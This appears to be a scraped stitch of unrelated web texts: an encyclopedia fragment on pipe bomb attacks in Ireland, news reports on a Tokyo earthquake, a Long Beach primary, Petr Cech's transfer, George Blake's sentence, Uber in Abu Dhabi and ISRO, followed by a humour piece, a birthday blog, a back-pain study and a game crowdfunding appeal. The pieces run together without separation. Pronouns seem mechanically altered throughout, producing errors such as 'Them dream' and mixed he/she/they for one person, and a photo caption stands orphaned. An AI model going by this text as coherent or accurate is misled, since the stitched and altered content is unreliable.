In Northern Ireland, there have been hundreds of pipe bomb attacks since the mid-1990s (towards the end of the "Troubles"). Most of the attacks have been launched by loyalist paramilitaries opposed to the 1994 ceasefires, especially the Red Hand Defenders (RHD) and Orange Volunteers (OV). However, they have also been used by Irish republican paramilitaries and by anti-drugs vigilante group Republican Action Against Drugs (RAAD). They are also used extensively in the south of Ireland by feuding criminals, including drug dealers, mainly in the capital city of Dublin.
As well as users such as criminals, paramilitaries, and militias, they also have a long tradition of recreational use for amusement or mischief with no intention to cause injury to anyone, but due to the dangers of premature ignition and of shrapnel, pipe bombs are much more dangerous than alternatives such as dry ice bombs or spud guns.
Notable incidents [ edit ]
[5] This 1886 engraving was the most widely reproduced image of the Haymarket riots . It inaccurately shows Fielden speaking, the pipe bomb exploding, and the rioting beginning simultaneously.
An official of the Japan Meteorological Agency points at a screen showing Wednesday's magnitude 6.1 earthquake (bottom L) and recent epicentral distribution of earthquakes in northern Japanese areas during a news conference following the magnitude 6.1 earthquake in Tokyo March 14, 2012. REUTERS/Issei Kato
TOKYO (Reuters) - An earthquake with a preliminary magnitude of 6.1 hit east of Tokyo on Wednesday but no tsunami warning was issued and there were no initial reports of damage or troubles at area nuclear plants, the Japan Meteorological Agency and local media said.
High-speed bullet trains serving northern Japan were halted and the two runways at Tokyo's Narita International Airport were closed after the quake but quickly resumed operations, local media reported.
No abnormalities were reported at the Tokai No.2 nuclear power plant northeast of Tokyo, which has been shut for routine maintenance, or at Tokyo Electric Power Co's tsunami-hit Fukushima Daiichi and Daini plants, local media said.
The earthquake, which caused substantial shaking in Ibaraki and Chiba prefectures east of Tokyo, followed just a few hours after a magnitude 6.8 quake jolted northern Japan. A tsunami warning was issued but later lifted after that earthquake.
Just over one year ago, the northeast coast was struck by a magnitude 9 earthquake, Japan's strongest on record, and a massive tsunami, triggering the world's worst nuclear crisis in 25 years at the Fukushima Daiichi plant.
There has been a five-fold increase in the number of quakes in the Tokyo metropolitan area since the year-ago disaster, the Tokyo University Earthquake Research Institute has said.
Updated: Election 2016 - 20th A.D.
Posted Tuesday, September 13, 2016 11:06 pm
Long Beach City Councilman Anthony Eramo defeated former Nassau County Legislator Jeff Toback by a wide margin in Tuesday's Democratic primary for the vacant 20th Assembly District seat.
According to unofficial results released with all 114 voting districts reporting, Eramo had 2,828 votes, or 71 percent, while Toback garnered 1,130 votes, or 28 percent.
Eramo will face Republican candidate Missy Miller, of Atlantic Beach, and Green Party candidate Joseph Naham, of Long Beach, in the Nov. 8 general election.
Nassau Democrats nominated Eramo at the party's convention in May, after the 20th Assembly District seat was vacated by State Sen. Todd Kaminsky. Kaminsky, a Democrat, won the April 19 special election for the Senate seat of former Majority Leader Dean Skelos, who was removed from the Senate when they were convicted of corruption charges last December.
Shortly after the polls closed at 9 p.m. on Tuesday, Nassau County Democratic Committee Chairman Jay Jacobs and members of Eramo's campaign called the election for Eramo, saying that they had won by a 2-to-1 margin. Toback conceded the race even though the vote totals were not official.
“This is a great victory — this is our victory,” Eramo told their supporters in a victory speech at the Park Sports Bar & Grill in Long Beach. “This was never just about Long Beach, this was about all of us, the whole district. I am truly humbled that the people of the South Shore trust me to represent them. To have the support of all my friends, neighbors and colleagues throughout this campaign is very humbling to me. This resounding win has emboldened me to continue to stand up for reform and for middle-class values in the Assembly.”
Eramo, 42, vice president of the City Council, is a Verizon field technician and serves as the chief flight attendant for Local 1106. They pointed to their strength as an advocate in their campaign against Toback, 56, an attorney and a fellow Long Beach resident.
“I congratulate Anthony, their family and their team on their impressive win,” Toback said. “I'm sure they will prevail in November, and hope that as our assemblyman, they pay attention to some of the important issues we raised in the campaign, that will better serve the residents of the district.”
Eramo pledged to work with Kaminsky — who stood by Eramo's side as they thanked their supporters — in the State Legislature, and to fight for stronger ethics reforms, if they are elected in November.
“I supported Anthony — I saw what they did for Long Beach after Superstorm Sandy, and I know they care about the average taxpayer,” Kaminsky said. “I'm going to need a good partner in Albany to help in the battle against corruption and make sure special interests aren't calling the tune, and I think we're going to work well together.”
Eramo touted their environmental advocacy during the campaign — they led an effort by the council against a proposed liquefied natural gas terminal off the coast of Long Beach last year — and pledged to fight for lower taxes, more state education aid and more help for Sandy victims.
“South Shore families have faced many challenges in recent years, and today we had to make a choice,” they told the crowd. “The difference between my opponent and us was clear: rising costs of living, eroding protections for workers and the utter devastation of Superstorm Sandy pushed us to the limit, but we are not broken. We deserve a strong advocate in Albany with the experience and proven record of leadership to fight for our families and ensure a better life for all.”
Eramo supports an effort led by Kaminsky in the Senate to ban state lawmakers from earning outside income in the wake of the corruption convictions of Skelos and former Assembly Speaker Sheldon Silver last year, and they pledged to resign from their job to focus on being a full-time legislator.
Toback, who was endorsed by Nassau County Legislator Denise Ford (R-Long Beach), the New York League of Conservation Voters and the Nassau County Police Benevolent Association, among other groups, presented themselves as the more moderate candidate during the race. They regularly criticized Eramo over a proposed 20-year, $109 million tax break that the developer iStar was seeking to build luxury apartment buildings on the vacant Superblock property. Eramo emphasized that while they supported a labor agreement with iStar that they said would benefit hundreds of local union workers, they did not speak in favor of the tax abatement.
Eramo had the support of numerous labor unions and other organizations ranging from the Women's Equality Party to the Working Families Party. They were also backed by the Long Beach Democratic Committee, members of the Independent Democratic Club of Long Beach and many of Toback's former colleagues in the County Legislature.
Eramo thanked their family and campaign staff, as well as Kaminsky and other supporters, including State Comptroller Tom DiNapoli, former Assemblyman Harvey Weisenberg, Assemblywoman Michaelle Solages, Assemblyman Charles Lavine, City Council President Len Torres and Councilman Scott Mandel.
“I think the combination of Kaminsky and Eramo is truly going to deliver for our area the support we need and the voice we need in Albany — it's a championship duo,” said Mandel, adding that it was too early to say who might replace Eramo on the council if they win in November.
In a district where Democrats outnumber Republicans, Kaminksy said that Eramo remains a formidable candidate. “Democrats have a vast majority in the Assembly, and having a Democrat in the Assembly provides a tremendous advantage to the district, because we'll be able to bring resources — both legislatively and monetarily — to the district,” Kaminsky said. “It's been a Democratic district for a long time, and I expect it to remain so, and I look forward to working with Anthony to help push them over the finish line in November.”
Petr Cech is on the verge of completing their protracted £11m transfer to Arsenal from Chelsea, having undertaken their medical on Friday, but the north London club fear that they will be beaten to the signing of Southampton's Morgan Schneiderlin by Manchester United.
Arsène Wenger has wanted to upgrade their squad in two principal areas – goalkeeper and defensive midfield – and Cech's capture ticks the first of those boxes. The 33-year-old's arrival represents something of a coup for the Arsenal manager and not only because of the goalkeeper's experience and enduring quality. José Mourinho had been fiercely opposed to selling Cech at all, let alone to a Premier League rival.
Leicester City secure signing of Shinji Okazaki from Mainz Read more
Arsenal have monitored Schneiderlin, who has performed at a consistent level for Southampton in the Premier League and established themselves in the France squad. Wenger was delighted at the emergence last season of the defensive midfielder Francis Coquelin, but they suggested in May that they remained in the market for another player in the position. Schneiderlin fits the bill.
Arsenal, though, are worried that any bid they might make for Schneiderlin would be trumped by United, who would also be able to offer them higher wages. United have looked at Bayern Munich's Bastian Schweinsteiger and they are currently in the driving seat for Schneiderlin, who is determined to move to a club who are in the Champions League.
They wanted to join Tottenham Hotspur last summer only for Southampton to block the move, much to their irritation. Few people at Southampton expect them to stay this time, and a bid of around £25m would be difficult to turn down.
Mauricio Pochettino, who worked with Schneiderlin at Southampton before becoming manager at White Hart Lane in May last year, remains a big admirer but Spurs claim that they have not moved for the 25-year-old this summer.
Cech is poised to become only the sixth player to switch directly from Chelsea to Arsenal – following Bill Dickson (1953), George Graham (1966), William Gallas (2006), Lassana Diarra (2007) and Yossi Benayoun (loan, 2011). The Czech lost their starting place at Stamford Bridge last season to Thibaut Courtois and they were clear that they could not countenance another campaign as the Belgian's understudy.
QPR's Matt Phillips in talks with Crystal Palace, Sunderland and West Brom Read more
They owe their move to Arsenal to Roman Abramovich, the Chelsea owner, who has allowed them to join the club of their choosing, even a rival – a rare and special privilege. Abramovich has allowed sentiment to colour their decision. They have built a close relationship with Cech and they are respectful of the service that the player has given to Chelsea. Over 11 years at the club, Cech has won every major honour, including four league titles and the Champions League in 2012.
Cech's arrival at Arsenal, which means that they will not have to uproot their family from London, could see David Ospina squeezed out. The Colombia international only joined Arsenal from Nice last summer for £3m. The Turkish club, Fenerbahce, are in talks over signing him.
Just why George Blake, the cold war spy, was sentenced in 1961 to an unprecedented 42-year prison sentence has always been a puzzle.
A decade earlier, the spy Klaus Fuchs had been sentenced to just 14 years for passing atom bomb secrets to the Soviet Union. Others, notably Anthony Blunt and John Cairncross, members of the Cambridge spy ring, would soon be offered immunity from prosecution.
Glib claims, notably by the journalist, Chapman Pincher, that Blake was sentenced a year for every British agent executed as a result of their betrayal, never quite rang true. Pincher claimed that their source was a politician who had been briefed with the approval of the prime minister, Harold Macmillan.
An astonishing revelation that may help to explain the severity of the sentence has just come to light. Lord Parker, the Lord Chief Justice - England's most senior judge - phoned Macmillan to consult them before passing sentence at the end of Blake's trial at the Old Bailey.
The breach of the basic principle that judges in a criminal trial are independent of the government and must on no account collude, or discuss the facts of a case, with ministers has been disclosed by Thomas Grant, QC, in the paperback edition of their book, Jeremy Hutchinson's Case Histories.
Blake was the first high profile client Hutchinson defended as a QC. The barrister, now 100, later defended Christine Keeler, the Great Train Robber Charlie Wilson, the drug smuggler Howard Marks, and two anti-nuclear campaigners who later helped Blake to escape from prison - Michael Randle and Pat Pottle.
Parker stunned commentators - as well as MI6, Blake's employer - for flying in the face of convention by handing down maximum consecutive, rather than concurrent, sentences on the indictments with which Blake was charged.
Even Macmillan expressed surprise, noting in their diary the next day: “The LCJ has passed a savage sentence — 42 years!” Their comment certainly raises questions about Pincher's claims.
Parker's phone call to Macmillan came to light after the publication of a hardback edition of Grant's book last year. Hutchinson received a memo from a retired, barrister, Ben Hytner, QC.
Hytner and Parker had been guests at a judges' dinner in Manchester soon after the Blake trial. “Blake's conviction was still a talking point and Hytner was astonished to hear Parker discussing the case freely with a small group of young barristers after dinner”, Grant told the Times newspaper.
“Lord Parker told their audience that they had not wished to pass sentence without knowing what damage Blake had inflicted on the country, and so they had telephoned Macmillan the night before the trial to find out.” Grant added: “Parker's action led to a miscarriage of justice.”
Blake escaped from Wormwood Scrubs in 1966 with the help, not of the KGB which the government at first assumed, but of Randle and Pottle, who had been jailed under the Official Secrets Act for demonstrating inside a US air force base, and of a petty criminal, Sean Bourke.
Blake won over the sympathy of many inmates, including Randle and Pottle, precisely because of their harsh sentence. After a trial in which they defended themselves, Randle and Pottle were acquitted by an Old Bailey jury in 1991 of helping Blake to escape even though they admitted their role.
MI6 officers privately expressed concern about the length of Blake's sentence, saying it would hardly encourage other double agents to confess. Blake, now 93, lives in a dacha outside Moscow.
Get the biggest daily stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
An atheist mum has stopped their children from going on school trips to churches, mosques and synagogues because they do not want religion forced on them.
Claire Baker, 32, says they believe an atheist upbringing is as much a choice as being brought up with a religion - which they do not want forced on their son and daughter.
Instead they would prefer their children Benn, 12, and Katie, eight, to learn first aid, because it would be more useful.
Claire says they feel the same way about all religions - and finds it offensive that people preach in public places or go door-to-door trying to convert people.
The mum is also considering removing their children from RE lessons at Elmwood Primary School in Middleton and Middleton Technology College.
They have refused to be a Godmother to a relative's child and says they believe people with no faith should not have to eat Halal or Kosher prepared food.
The mum spoke out after receiving a letter from the primary school about trips to places of worship.
WATCH: Claire Baker talks about the decision
Video Loading Video Unavailable Click to play Tap to play The video will start in 8 Cancel Play now
They posted their comments about the school trip on Facebook it provoked a huge debate - with some agreeing it is a parent's right to choose and others saying it is important to understand others' beliefs.
Claire, who lives with Benn, Katie, and partner Craig Livesey, 47, in Middleton and is a support worker for adults with learning difficulties, said: “From a young age I've always been an atheist.
“I chose non-religious schools for my children on purpose so they can make their own minds up when they're older if they want to practice a religion.
“I don't think RE should be on the curriculum - it should be replaced with First Aid, which is more useful in life.
“I was shocked to receive a letter for a school trip to a mosque, church and synagogue.
“I absented my child and have been debating for the best part of a year whether to take my children out of RE lessons.
“I respect that people choose to christen their children but I would also like them to respect that I have no interest in religion.
“Also why should I have to take my children to get baptised to get them into good schools? “It's all about choice - I don't go banging on peoples' doors or preaching in town centres about it.
“People have accused me of being racist, but this is about all religions, not race.”
(Image: Sean Hansford)
The M.E.N. was unable to contact Elmwood Primary School for a comment.
Current UK law states that all pupils should follow a curriculum which promotes spritual, moral and cultural development' - of which RE is essential.
Government guidance also states the subject ‘promotes community cohesion' and ‘become responsible citizens.”
But parents are able to withdraw children from RE lessons.
The rules state:
“The use of the right to withdraw should be at the instigation of parents (or pupils themselves if they are aged 18 or over), and it should be made clear whether it is from the whole of the subject or specific parts of it. No reasons need be given.
“Parents have the right to choose whether or not to withdraw their child from RE without influence from the school, although a school should ensure parents or carers are informed of this right and are aware of the educational objectives and content of the RE syllabus. In this way, parents can make an informed decision.
“Where parents have requested that their child is withdrawn, their right must be respected, and where RE is integrated in the curriculum, the school will need to discuss the arrangements with the parents or carers to explore how the child's withdrawal can be best accommodated.
"If pupils are withdrawn from RE, schools have a duty to supervise them, though not to provide additional teaching or to incur extra cost. Pupils will usually remain on school premises.”
Indian Space Research Organisation is planning to increase the number of satellite launches every year, a top ISRO official said on Friday. "We are planning to increase the number of rocket launches from the present eight to 12 every year," ISRO Chairman AS Kiran Kumar said at a function in Chennai.
Kumar, who was here to participate in the MIT Alumni Golden Jubilee Celebrations, said the scientists were gearing up for the launch the GSLV-MarkII (Geosynchronous Satellite Launch Vehicle) carrying weather satellite in August.
Vikram Sarabhai Space Centre, Director K Sivan said the weather monitoring and forecasting satellite on board Polar Satellite Launch Vehicle is also planned to be launched later this year. Last month, ISRO had put into orbit 20 satellites, including the earth observation satellite -- Cartosat-2, on board PSLV-C34 in a single launch from the spaceport of Sriharikota, about 135 kms from Chennai.
Shota Kageyama, the musical composer and arranger of several recent Pokémon games and anime, announced on Thursday that they left the company Game Freak on New Year's Eve to form a new music brand:
[Greetings] Happy New Year, everyone. I'm sorry to raise a personal matter, but I left (graduated) Game Freak, who has been good to me these past six years and seven months, on December 31 to start a new music brand called Spica Musica.
【ご挨拶】みなさま、明けましておめでとうございます。私事で恐縮ですが、2013年12月末日をもって、6年7ヶ月間お世話になった株式会社ゲームフリークを退職(卒業)し、本年1月から独立、新たに SPICA MUSICA(スピカムジカ)という音楽ブランドを立ち上げることとなりました。 — 景山 将太 (@shotakageyama) January 1, 2014
Kageyama plans to continue in the game music field as well as various other new fields. They added that even as they go independent, their colleagues at Game Freak sent them off with smiles and support him. They would not say that this is a farewell to everyone at Game Freak, since they think it would be great if they can create something together again.
Kageyama composed the music in the Pokémon X and Y , Pokémon Black and White , and Pokémon HeartGold and SoulSilver games. They also collaborated on the soundtracks for Luminous Arc and Super Smash Bros. Brawl . They scored the Pocket Monsters: The Origin anime special.
[Via Hachima Kikō]
An illustration picture shows the logo of car-sharing service app Uber on a smartphone next to the picture of an official German taxi sign September 15, 2014. REUTERS/Kai Pfaffenbach/Illustration/File Photo
ABU DHABI (Reuters) - Ride-hailing companies Uber [UBER.UL] and Careem have suspended services in Abu Dhabi, the capital of the United Arab Emirates, since Saturday and do not know when they can resume operations, they said on Sunday.
The National, a UAE newspaper, quoted unnamed sources as saying that as many as 50 drivers for Uber and Careem had been arrested.
An Abu Dhabi source familiar with the situation told Reuters some drivers had been detained over violations of regulations, but did not specify how many drivers or describe the violations.
“This is a temporary suspension and we will let you know of any further updates,” an Uber spokesperson in Dubai said via email. They did not respond to questions about the arrests or the reason for the suspension of services.
Christian Eid, vice-president of marketing and communications for Careem, a Dubai-based company, said many of its drivers were being stopped by authorities in Abu Dhabi, apparently over licensing issues, and as a result had become nervous and were staying off the roads. This had forced Careem to halt services there, they said.
The Abu Dhabi government's Center for Regulation of Transport by Hire Cars, which manages the taxi and transport sector, did not respond to queries. The center oversees about seven taxi operators and 18 limousine operators, some of which are partly government-owned. Abu Dhabi police did not respond to requests for comment.
Uber and Careem said they had not suspended operations in neighboring Dubai, the commercial and tourist hub of the UAE. The emirate of Abu Dhabi has a population of about 2.8 million and Dubai has roughly 2.5 million.
Uber, which launched services in Abu Dhabi in 2013, said last year that the Middle East and North Africa contained some of its fastest-growing markets and that it planned to invest $250 million to expand in the region.
We're not journalists here at Cracked, but thanks to Google and a little something called baseline literacy, we're once again here to bring you the latest in unmitigated horseshit the news has to offer. No need to thank us with offerings of gifts and/or tasteful nude photographs -- all we ask is that the next time you read about the latest teen trend or crazy story from China in your news feed, keep in mind that it might be baloney, just like ...
6 Selfies Aren't Spreading Head Lice Selfies Aren't Spreading Head Lice
Selfies have popped up in all sorts of dumbass situations lately, but the real horror apparently comes in the last place you'd expect:
businessinsider.com
"It's just like the dick pics crabs outbreak of '09."
↓ Continue Reading Below Advertisement
Coming from CBS, Business Insider, CNET, and TIME, the story highlights an expert warning that taking group selfies is causing an epidemic of teenagers' pressed heads passing the little fuckers around. Gross!
[inject-module]
But don't shave your tweenager's head just yet, because the "expert" quotes are from an interview with the owner of Nitless Noggins, a small California company that offers delousing by way of a rented "LouseBuster" and zero medical qualifications. According to an actual doctor, there's not only no influx of lice, but also no reason they would spread among teenagers ... or anyone who isn't under 11 years old. So yeah, you're probably fine to smush your manes together for duckface photos (unless you like to break into dubious motel rooms and bury your head under pillows for prolonged amounts of time).
Today is my wife's birthday. Right now she's relaxing and getting the hour-long massage they needed six months ago. I'm still not sure what we're doing tonight, but I can assure you it will have something to do with having a great meal, and spending a night in a luxurious hotel. Relaxation is something we do not take enough time out of the year to treat ourselves to.
Running a small business is hard. I've watched Regan run Regan's Brain for the last several years before I jumped into the fray. People who haven't ran their own business have no idea. They think it's all just fun and profit, you sell stuff, then you magically make it and ship it away. That's not the case.
Regan spends a lot of time corresponding to inquiries, talking to customers, marketing themselves (blogging, sales team stuff, wholesale), taking photos, listing items, creating new items, doing all of the paperwork that an accountant would do (Spreadsheets and paying bills), design work, constructing each item from scratch, shipping and tracking orders, ordering and shopping for supplies, hitting estate and garage sales with me, and to top it all off … teaching dance.
Between the dance and their Etsy site, she's probably working a 50 – 60 hours a week job. Only no one understands this. Sometimes even I forget this. They just think “Oh, how nice. They only have to work PT and they get to make pillows the rest of the time.” If it were only that simple.
I've seen the stress and the panic come holiday time. It sometimes seems to nearly overwhelm her, but they always get everything done. Them dream is to be able to make a good living doing this. Each year they get a little closer, but it's harder than people realize.
My hats off to you special lady.
I hope you have a wonderful birthday.
Advertisements
People who use weight training to ease their lower back pain are better off than those who choose other forms of exercise such as jogging, according to a University of Alberta study.
The study, done in conjunction with the University of Regina, showed a 60 per cent improvement in pain and function levels for people with chronic backache who took part in a 16-week exercise program of resistance training using dumbbells, barbells and other load-bearing exercise equipment.
In contrast, people who chose aerobic training such as jogging, walking on a treadmill or using an elliptical machine to ease their back pain only experienced a 12 per cent improvement, said Robert Kell, an assistant professor of exercise physiology at the University of Alberta, Augustana Campus.
The resistance-training group showed improvements in pain and function of about 60 per cent, while those who took aerobic training experienced only a 12 per cent improvement.
"Any activity that makes you feel better is something you should pursue, but the research indicates that we get better pain management results from resistance training." The extra benefits stem from using the whole-body approach required in resistance training, Kell believes. "We tried to strengthen the entire body and by doing that, we decreased the fatigue people felt throughout the day. They were better able to perform their activities of daily living." Aerobics training generally works just the lower body, they added.
Approximately 80 per cent of North Americans suffer from lower back pain at some point in their lifetimes, and for 85 per cent of them the pain is chronic.
Both types of training did provide other fitness benefits, such as lower body fat, the study showed.
The findings are to be published in early 2009 in the Journal of Strength and Conditioning Research.
###
For more information on the study contact:
Robert Kell, assistant professor
Department of Social Sciences
Augustana Campus, University of Alberta
780-679-1651
Rob.kell@ualberta.ca
About
SPATIUM is a new type of arcade game project which is made to improve players' reactions (and reflexes) while having fun on their mobile devices.
It's very easy to pick up and play right away but the most important bit is that it's suitable for all ages. We believe that makes it a great challenge for families, mates or even "loners" (on their bus ride to work or simply having a boring coffee break).
Our team (Basicks Studio) is focused on developing free games that seem no different than most of the apps people get on the market but then again - we build a product which main goal is to improve certain abilities without users noticing that.
Here's the thing - no one of us is a "coding developer" so we pay freelancers and small companies to bring our ideas to life. Since our apps go for free we do not make any sales/money. The only way to keep the projects budget "wet" is to show annoying (in-app) ads to the users and even then we struggle to reach our goals. (we are ad-free content lovers too so once the game is finalised we will take them down)
If you have android device around you, please feel free to check out what we've done with Spatium so far (don't forget to share your best results :)))) on https://play.google.com/store/apps/details?id=com.basicks.spatium.android
The reviews/feedback we got by now is amazing (4.9 out of 5) but the main issue is that we can not finalise the game because we are already short on budget.
What we plan to do (with little help from you of course):
Integrate 2 new modes (so users could smoothly train their brains without getting annoyed)
(so users could smoothly train their brains without getting annoyed) Integrate multiplayer mode (so you could challenge anyone around the world as long as 3G/4G or Wi-Fi is available)
(so you could challenge anyone around the world as long as 3G/4G or Wi-Fi is available) Introduce a new type of energy balls for the best of you (these are surprise for now)
for the best of you (these are surprise for now) Integrate "Google Leaderboards" (you could keep track on how good you are compared to the rest of the world or your mates)
(you could keep track on how good you are compared to the rest of the world or your mates) Fix some minor issues that came up after the last update
that came up after the last update iOS version of Spatium (including everything listed above)
The whole development process takes time and (of course) costs money. We will appreciate anything you could do for us. Whether you can spare some bucks or not, please share this campaign within your social circles!
We promise to keep you posted on our progress!
Thank you for taking your time to read this and have a great day!
Team Basicks
